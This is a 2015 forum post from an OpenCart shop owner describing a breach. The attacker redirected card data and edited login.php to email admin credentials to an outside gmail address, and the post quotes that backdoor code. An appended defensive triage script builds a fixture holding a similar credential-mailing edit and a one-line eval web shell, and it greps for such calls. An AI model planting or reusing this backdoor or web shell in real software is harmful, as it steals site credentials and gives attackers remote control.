Admin password hack + Authorize.net
Posted: Mon Jul 06, 2015 10:30 pm
OC 1.5.5.1
Just discovered some little shitbag got into our site through the /download vulnerability. I thought I'd secured that, so have now deleted that directory, turned off downloads, and reset the main account password (server level).
Digging around I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.
By pure luck, after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... the little fucker had edited login.php too!! Haven't seen anyone else report this - a pretty simple script edit that emails the login info:

Code:
    protected function validate() {
        // Stock OpenCart check: flag an error if the posted credentials don't log in
        if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
            $this->error['warning'] = $this->language->get('error_login');
        }
        if (!$this->error) {
            // Attacker's addition: on every successful admin login, build
            // "host/path|username|password" and mail it out before returning
            $smail=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$this->request->post['username']."|".$this->request->post['password'];
            mail("thankforyourhelp2015@gmail.com","OUR-SITE",$smail,"From: OUR-SITE@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
            return true;
        } else {
            return false;
        }
    }

So as soon as I updated things, he knew our new credentials!!!
I'm traipsing through file edit dates now to see if anything else was compromised, but one to look out for, guys and gals!!
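The kind of triage script I'd run for this sort of compromise, added here as an example and not code from the original post or from OpenCart itself. It generalizes the post's login.php case to every PHP file under the web root and models three checks: which files are newer than a known-good timestamp, which files call mail()/eval()/base64_decode(), and which files differ from a pristine copy of the same OpenCart release. The `clean` and `site` directory names, the `reference` timestamp file and the placeholder attacker address are all assumptions made up for the fixture the script builds so it can run offline.

```shell
#!/bin/sh
# Added triage helpers (not code from the original post or from OpenCart).
# "clean", "site", "reference" and attacker@example.com are assumptions used
# only by the constructed fixture below.
set -eu

# PHP files under $1 with an mtime newer than the reference file $2
# (e.g. a file touched at the last known-good deploy).
recently_modified() {
  find "$1" -type f -name '*.php' -newer "$2" | sort
}

# PHP files under $1 that call functions a stock OpenCart controller
# has no business calling.
grep_mail_calls() {
  find "$1" -type f -name '*.php' -exec grep -lE 'mail\(|base64_decode\(|eval\(' {} + | sort
}

# Compare the live tree $2 with a pristine tree $1: report files whose
# content differs and files that exist only in the live tree.
diff_against_clean() {
  clean=$1
  live=$2
  ( cd "$live" && find . -type f -name '*.php' ) | sed 's|^\./||' | sort |
  while read -r rel; do
    if [ ! -f "$clean/$rel" ]; then
      printf 'ONLY-IN-LIVE %s\n' "$rel"
    elif ! cmp -s "$clean/$rel" "$live/$rel"; then
      printf 'MODIFIED %s\n' "$rel"
    fi
  done
}

# Constructed fixture: a clean tree and a live tree where login.php carries
# the credential-mailing edit (attacker address replaced by a placeholder)
# plus one dropped webshell. Prints the base directory it created.
setup_fixture() {
  base=$(mktemp -d)
  for t in clean site; do
    mkdir -p "$base/$t/admin/controller/common" "$base/$t/catalog/controller/common"
    printf '<?php\nclass ControllerCommonHome extends Controller { public function index() { $this->response->setOutput("ok"); } }\n' \
      > "$base/$t/catalog/controller/common/home.php"
  done
  cat > "$base/clean/admin/controller/common/login.php" <<'EOF'
<?php
class ControllerCommonLogin extends Controller {
    protected function validate() {
        if (!$this->error) {
            return true;
        } else {
            return false;
        }
    }
}
EOF
  cat > "$base/site/admin/controller/common/login.php" <<'EOF'
<?php
class ControllerCommonLogin extends Controller {
    protected function validate() {
        if (!$this->error) {
            $smail = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "|" . $this->request->post['username'] . "|" . $this->request->post['password'];
            mail("attacker@example.com", "OUR-SITE", $smail);
            return true;
        } else {
            return false;
        }
    }
}
EOF
  printf '<?php eval(base64_decode($_POST["c"]));\n' > "$base/site/catalog/controller/common/cache.php"
  # Backdate the untouched files and create a reference file with the same
  # timestamp, so only the attacker's writes show up as newer than it.
  touch -t 201506010000 "$base/site/catalog/controller/common/home.php" \
    "$base/clean/admin/controller/common/login.php" "$base/reference"
  echo "$base"
}

# Stand-alone run over the fixture.
run_triage() {
  fx=$(setup_fixture)
  echo "== PHP files newer than the reference =="
  recently_modified "$fx/site" "$fx/reference"
  echo "== PHP files calling mail()/eval()/base64_decode() =="
  grep_mail_calls "$fx/site"
  echo "== differences from the clean tree =="
  diff_against_clean "$fx/clean" "$fx/site"
}
run_triage
```

On a real site, point `recently_modified` at the web root with a reference file touched at your last deploy, and run `diff_against_clean` against a fresh download of the same OpenCart version. Treat the mtime check as a first pass only: an attacker can reset timestamps with touch, and a grep for mail() catches this particular edit but not one that ships credentials out with curl or fsockopen, so the diff against a pristine tree is the result to trust.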